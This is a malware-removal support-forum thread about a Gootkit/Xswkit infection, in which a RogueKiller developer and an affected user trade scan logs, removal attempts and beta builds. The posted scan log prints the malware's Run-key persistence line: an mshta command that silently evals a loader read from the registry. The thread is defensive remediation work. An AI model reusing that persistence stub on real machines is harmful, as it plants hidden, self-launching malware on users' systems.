[Gootkit/Xswkit] New rootkit found!

[Tigzy]

mmh, wide inject. I think the key is protected by all the injected processes.
The only way would be to remove the key "offline". Like with an OTLPE cd: http://oldtimer.geekstogo.com/OTLPENet.exe

That's a CD ISO + burner software, that you can use to boot onto, and then it's a full windows environment.
If you're advanced user you'll find a regedit able to mount extern hives, let me know if you think to be able to do it.

[Tigzy]

Looks like your malware is named "Gootkit": https://www.virustotal.com/fr/file/2a8eaa50b4c7c8b75f317fce2a3bc344109923ab65d91de6a6d571e829cbb68a/analysis/1420213053/

[Tigzy]

EP_X0FF has created a thread on kernel mode for that new infection, we're still analysing it, and searching its weaknesses.
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669

[Tigzy]

It looks like a simple Run value removal is enough to remove the malware.
Can you please confirm once again?

[Tigzy]

Here's the infection log from the beta version of RogueKiller. I can put it online for testing if you need.

Code: [Select]

RogueKiller V10.1.1.0 [Dec 23 2014] par Adlice Software
email : http://www.adlice.com/contact/
Remontées : http://forum.adlice.com
Site web : http://www.adlice.com/fr/logiciels/roguekiller/
Blog : http://www.adlice.com

Système d'exploitation : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Démarré en  : Mode normal
Utilisateur : tigzy [Administrateur]
Mode : Scan -- Date : 01/03/2015  15:37:17
Commutateurs : -nokill

¤¤¤ Processus : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]

¤¤¤ Registre : 10 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)

¤¤¤ Tâches : 0 ¤¤¤

¤¤¤ Fichiers : 0 ¤¤¤

¤¤¤ Fichier Hosts : 2 ¤¤¤
[C:\WINDOWS\System32\drivers\etc\hosts] 127.0.0.1       localhost
[C:\WINDOWS\System32\drivers\etc\hosts] ::1             localhost

¤¤¤ Antirootkit : 4 (Driver: Chargé) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)

¤¤¤ Navigateurs web : 0 ¤¤¤

¤¤¤ Vérification MBR : ¤¤¤
+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 4086 MB
User = LL1 ... OK
User = LL2 ... OK

============================================
RKreport_SCN_01032015_152034.log


[Jojo51]

Hi!

Sounds good, it looks like that you've done a great job! Thank you very much!!

Yes, if you can give me the new version I will test it on our infected computers. I will be your BETA tester !!

Speak soon,


Johnny

[Jojo51]

No, simply deleting the RUN value doesn't stop the infection. It seems that there is still something in it that makes the explorer.exe crash in loop.

[Tigzy]

You may want to try that version: http://download.adlice.com/RogueKiller_beta.exe

[Jojo51]

Thanks! I've just downloaded it.

Need I start it in safe mode or normally? Does it clean all the infected hives or only the one with the program is started??

Sorry for the questions, but I want to be sure to use your tool with the best practice!


Johnny

[Tigzy]

All the hives are cleaned.
In normal mode should be ok.

Should you need additional info: http://www.adlice.com/gootkitxswkit-removal-roguekiller/

[Jojo51]

Bad news

I have tested the BETA but it seems to fail to clean the infection. It can find it, start the remove but after the next reboot, the threat is back. We can spot it when we restart RogueKiller. You will find in attachment the two scan report, the first and the second after the cleaning/reboot.

Thanks for the help.


Johnny

[Tigzy]

Jojo51, any chance I could remote access on one of the infected computer with TeamViewer?
I think that rootkit did download some friend to join the party, and maybe it's protecting it. That's unusual, but very possible.
I'll send you an MP to meet on skype.

EDIT: The RUN key hasn't been found. Strange.

[Jojo51]

Yes, no problems! We can plan a Teamviewer session on an infected computer today @03:00pm (french time).

You can use my email (**********) to add me in Skype, I'm logged on at the moment.

Does it sound ok for you?

[Tigzy]

Will contact you on skype.
(I'm removing your address to avoid spam)

[Tigzy]

For those who were following, it's probably the bootkit version of Gootkit.
So MBR/VBR infection of type Rovnix.